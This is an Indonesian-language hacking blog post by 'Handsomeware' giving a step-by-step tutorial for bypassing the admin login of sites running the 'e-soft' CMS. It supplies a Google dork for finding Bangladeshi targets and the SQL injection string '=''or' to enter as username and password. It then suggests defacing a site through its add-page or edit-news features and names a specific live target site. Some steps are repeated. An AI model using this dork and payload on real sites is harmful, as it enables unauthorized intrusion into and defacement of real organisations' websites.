Kuy kali ini gw akan share tutorial bypass admin cms e-soft.
Dork:
"/web_admin/" site:bd
Note: Dorknya dikembangin lagi ya!
Exploit:
http://site.bd/web_admin/
#Step by step
1. Cari target dengan dork diatas
2. Masukan exploitnya
3. Login dengan username dan password diisi dengan : '=''or'
4. Kalau vuln akan diarahkan ke admin panelnya , saya belum coba untuk upload shell. Tapi kalau mau masukin script deface , silahkan masuk fitur add page atau edit news atau sejenisnya.
Live target :
http://pegasusshoes.com.bd
Sekian dari saya Handsomeware.
Dork:
"/web_admin/" site:bd
Note: Dorknya dikembangin lagi ya!
Exploit:
http://site.bd/web_admin/
#Step by step
1. Cari target dengan dork diatas
2. Masukan exploitnya
3. Login dengan username dan password diisi dengan : '=''or'
Live target :
http://pegasusshoes.com.bd
Sekian dari saya Handsomeware.
ConversionConversion EmoticonEmoticon